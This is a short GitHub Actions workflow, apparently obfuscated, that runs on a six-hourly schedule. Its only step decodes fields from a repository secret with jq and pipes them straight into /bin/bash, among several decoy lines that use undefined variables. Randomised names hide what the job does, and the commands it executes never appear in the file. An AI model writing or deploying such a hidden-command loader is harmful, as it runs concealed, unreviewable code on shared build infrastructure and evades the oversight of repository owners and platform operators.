name: gouyanhuigg

on:
  workflow_dispatch:
  schedule:
    - cron: '3 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gouyanhuigg
        env:
          v04: ${{ secrets.v04 }}
        run: |
          echo $v04 | jq -r .a93 | /bin/bash
          echo $rqdn23 | jq -r .jzzc33038 | /bin/bash
          echo $flodw0817 | jq -r .rxw4 | /bin/bash
          echo $kbsly17 | jq -r .r28197 | /bin/bash
          echo $emiet71992 | jq -r .zrmz0941 | /bin/bash
          echo $eq1778 | jq -r .ff56071 | /bin/bash
          echo $kb42 | jq -r .z12 | /bin/bash
          echo $rodcu9 | jq -r .u5 | /bin/bash
          echo $bp4 | jq -r .cte84782 | /bin/bash

